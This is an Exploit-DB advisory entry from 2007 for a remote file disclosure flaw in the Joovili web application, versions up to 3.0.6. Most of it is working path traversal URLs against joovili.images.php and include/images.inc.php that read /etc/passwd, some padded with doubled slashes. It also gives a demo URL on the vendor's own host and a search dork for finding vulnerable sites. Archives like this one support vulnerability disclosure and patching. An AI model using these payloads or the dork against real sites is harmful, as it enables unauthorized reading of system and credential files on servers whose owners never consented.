Joovili <= 3.0.6 joovili.images.php Remote File Disclosure Vulnerability

2007-12-27T00:00:00
ID EDB-ID:4799
Type exploitdb
Reporter EcHoLL
Modified 2007-12-27T00:00:00

Description

Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability. CVE-2007-6620,CVE-2007-6621. Webapps exploit for php platform

                                        
                                            found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]